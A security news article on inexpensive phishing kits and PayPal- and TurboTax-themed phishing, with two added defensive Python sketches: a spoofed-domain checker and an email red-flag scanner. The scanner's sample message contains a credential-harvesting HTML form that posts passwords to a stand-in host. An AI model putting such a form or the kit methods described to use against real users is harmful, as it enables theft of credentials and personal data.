Fishing successfully in a lake requires patience. Phishing successfully in cyberspace, however, takes only a few dollars of investment.
According to Symantec, scammers can buy phishing kits for between $2 and $10. These kits do not always require technical skill to use – with just basic knowledge of PHP, attackers can customize their phishing pages to meet their needs, blogged Symantec’s Roberto Sponchioni.
“Some of the kits that we observed were quite basic and only included two web pages,” he blogged. “However, others appeared to be more professional and convincing, with more than 25 PHP source files and 14 different language files that can be loaded based on the user’s location. Scammers can use some of the more professional kits to not only steal user names and passwords, but also personal data such as names, surnames, dates of birth, credit card numbers, CVV numbers, Social Security numbers, and much more. These phishing kits can be used to mimic the appearance of popular websites belonging to companies involved in cloud storage, banking, email, and more.”
The scammers sometimes attempt to compromise legitimate content management systems (CMS) or blogs in order to install the kit on servers, Sponchioni explained. Attackers often build automated scripts to exploit vulnerabilities in order to compromise as many servers as possible, he noted.
“If the scammer doesn’t know how to compromise a site, they could rent a bullet-proof server or use a free hosting space to host their phishing kit,” he added. “Once the scammer has set up the kit, they then need to install a Simple Mail Transfer Protocol (SMTP) mailer so that they can import a list of users’ emails and send the phishing messages in bulk.”
Recently, researchers with OpenDNS revealed that they detected multiple domains created to impersonate the PayPal website as part of an email phishing campaign. One of the primary websites (redirectly-paypal.com) was registered Jan. 25 through Wix.com. One of the fraudulent domains (security-paypal-center.com), which had been dormant since its expiration in 2005, was re-registered Jan. 22 through Wix.com as well, according to OpenDNS. The firm also found many other PayPal-related spoofing domains.
“Most of the phishing sites these days leverage a kit to generate the content,” Andrew Hay, senior security research lead with OpenDNS, said in a statement. “We have it on good authority, from our contacts at PayPal, that the kits being used in this case were quite sophisticated when compared to others that they have seen previously. This kit makes the creation of fraudulent sites a relatively easy endeavor, as opposed to direct copy and pasting of code from the legitimate website.”
“We identified five sites within a one week research window that shared a similar level of sophistication,” he added.
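For defenders reviewing DNS or proxy logs, the spoofing pattern OpenDNS describes (a brand name embedded in a domain the brand does not own) can be checked mechanically. The following Python sketch is an added example, not code from OpenDNS or Symantec; the allow-list entry paypal.com, the digit-substitution table and every sample hostname other than the two named above are assumptions made for illustration.

```python
import re

# Assumption: the brand's legitimate registrable domains (not given on the page).
BRANDS = {"paypal": {"paypal.com"}}
# Digit-for-letter swaps undone before matching (a generalization added here).
LEET = str.maketrans("0134578", "oleastb")

def registrable(host):
    """Naive registrable domain (last two labels); production code should
    consult the Public Suffix List, since this is wrong for e.g. co.uk."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def brand_hits(host):
    """Return brands whose name appears in a hostname that is not theirs."""
    host = host.lower().rstrip(".")
    hits = []
    for brand, legit in BRANDS.items():
        if registrable(host) in legit:
            continue  # the brand's own domain or one of its subdomains
        # Split labels on '.' and '-' so embedded brand tokens are visible.
        tokens = [t.translate(LEET) for t in re.split(r"[.-]", host)]
        if any(brand in t for t in tokens):
            hits.append(brand)
    return hits

def scan(hosts):
    """Map each suspicious hostname to the brands it imitates."""
    flagged = {}
    for host in hosts:
        hits = brand_hits(host)
        if hits:
            flagged[host] = hits
    return flagged

# The first two names are the ones reported above; the rest are constructed.
SAMPLE = [
    "redirectly-paypal.com",
    "security-paypal-center.com",
    "www.paypal.com",
    "paypal.com.login.example",
    "paypa1-support.example",
    "intranet.example",
]

if __name__ == "__main__":
    for host, brands in scan(SAMPLE).items():
        print(host, brands)
```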
Phishers don’t wait long to jump on current events either. Researchers at Symantec spotted attackers taking advantage of the recent news surrounding Intuit’s TurboTax. Last week, Intuit briefly suspended e-filing of state income tax returns through TurboTax in response to a spike in fraudulent tax returns.
“Scammers have been masquerading as TurboTax in an attempt to phish account credentials of TurboTax users,” blogged Symantec’s Satnam Narang. “The email begins with ‘Dear TurboTax User,’ a common red flag that the email did not originate from TurboTax, as legitimate emails would address the user by their name. From there, the email gets straight to the point by asking the recipient to verify their identity to ensure uninterrupted service and prevent illegal activity. It provides instructions on how to do so, specifying that they need a modern browser with JavaScript enabled. The email contains an ‘attached form,’ an HTML attachment that borrows source code and elements from the real TurboTax website.”
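The red flags Narang lists, a generic greeting and an HTML attachment carrying a form, are the kind of traits a mail filter can test for. The following Python sketch is an added example, not Symantec's detection logic; the sample message is constructed from the description above rather than captured, and its addresses, boundary and flag names are hypothetical.

```python
import re
from email import message_from_string

# Constructed sample modelled on the description above; not a real capture.
SAMPLE = """\
From: "TurboTax" <service@mailer.example>
To: user@example.org
Subject: Verify your identity
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Dear TurboTax User,
Please verify your identity using the attached form.
--b1
Content-Type: text/html; name="form.html"
Content-Disposition: attachment; filename="form.html"

<html><form action="http://collector.example/submit" method="post">
<input type="password" name="pw"></form></html>
--b1--
"""

# "Dear <anything> User/Customer/Member" instead of the recipient's name.
GENERIC_GREETING = re.compile(
    r"^\s*dear\s+[\w ]*\b(user|customer|member)\b", re.I | re.M)

def red_flags(raw):
    """Return the red flags found in a raw RFC 5322 message, in MIME order."""
    flags = []
    for part in message_from_string(raw).walk():
        if part.is_multipart():
            continue  # containers carry no body of their own
        body = part.get_payload(decode=True).decode("utf-8", "replace")
        ctype = part.get_content_type()
        attached = part.get_content_disposition() == "attachment"
        if ctype == "text/plain" and not attached and GENERIC_GREETING.search(body):
            flags.append("generic-greeting")
        if ctype == "text/html" and attached:
            flags.append("html-attachment")
            # A password field inside an attached form is a credential prompt.
            if re.search(r"<form\b", body, re.I) and \
               re.search(r"type=[\"']?password", body, re.I):
                flags.append("credential-form-in-attachment")
    return flags

if __name__ == "__main__":
    print(red_flags(SAMPLE))
```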
Sponchioni suggested server owners keep their server’s software and CMS up-to-date and recommended end users stay alert.
“Phishing kits are becoming easier to find and use, potentially encouraging would-be scammers to steal information from users,” he blogged. “Users should remain cautious of phishing attempts and ensure that they safeguard their personal data.”
